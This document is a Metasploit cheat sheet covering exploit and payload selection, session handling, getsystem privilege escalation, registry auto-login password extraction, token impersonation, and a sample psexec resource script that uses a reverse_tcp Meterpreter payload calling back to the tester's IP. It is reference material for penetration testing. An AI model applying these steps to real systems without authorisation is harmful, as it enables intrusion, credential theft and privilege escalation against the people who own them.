Metasploit Framework (MSF)
Start db
msfdb start
or
systemctl start postgresql
Start metasploit framework console
msfconsole
Select exploit
use <exploit>
Run exploit
run
or
exploit
Show options
show options
Show advanced options
show advanced
Set option
set <option> <value>
Set option (global)
setg <option> <value>
Show payloads
show payloads
Select payload
set payload <payload>
Show sessions
sessions -l
Interact with session
sessions <number>
Send session to background
background
The shell command will present you with a standard shell on the target system.
shell
Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.
getsystem
Show encoders
show encoders
Select encoder
set encoder <encoder>
Search for exploits
search <term>
Go back
back
Display help
help
Get info about the current module or context
info
Show auxiliary modules
show auxiliary
Just start listener
use exploit/multi/handler
Start job in background
run -j
Show jobs
jobs
This module suggests local meterpreter exploits that can be used.
use post/multi/recon/local_exploit_suggester
This module extracts the plain-text Windows auto-login password stored in the registry.
use post/windows/gather/credentials/windows_autologin
This module will login with the specified username/password and execute the supplied command as a hidden process.
use post/windows/manage/run_as
Upgrade a plain shell session to a meterpreter session
use post/multi/manage/shell_to_meterpreter
Migrate to other (e.g. more stable) process
migrate
Get system info
sysinfo
Port forwarding
portfwd add -l <port> -r 127.0.0.1 -p <port>
Look for privileges such as SeImpersonatePrivilege, SeDebugPrivilege, etc.
whoami /priv
Load incognito module and list available tokens
load incognito
list_tokens -g
Impersonate a token, e.g. BUILTIN\Administrators
impersonate_token "BUILTIN\Administrators"
Migrate into a process that already runs with the desired permissions, in order to actually obtain them (holding a token is not the same as having the permission).
ps
migrate <pid>
Resource scripts provide an easy way to automate repetitive tasks in Metasploit. Run one with:
msfconsole -r demo.rc
Example contents of demo.rc:
use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>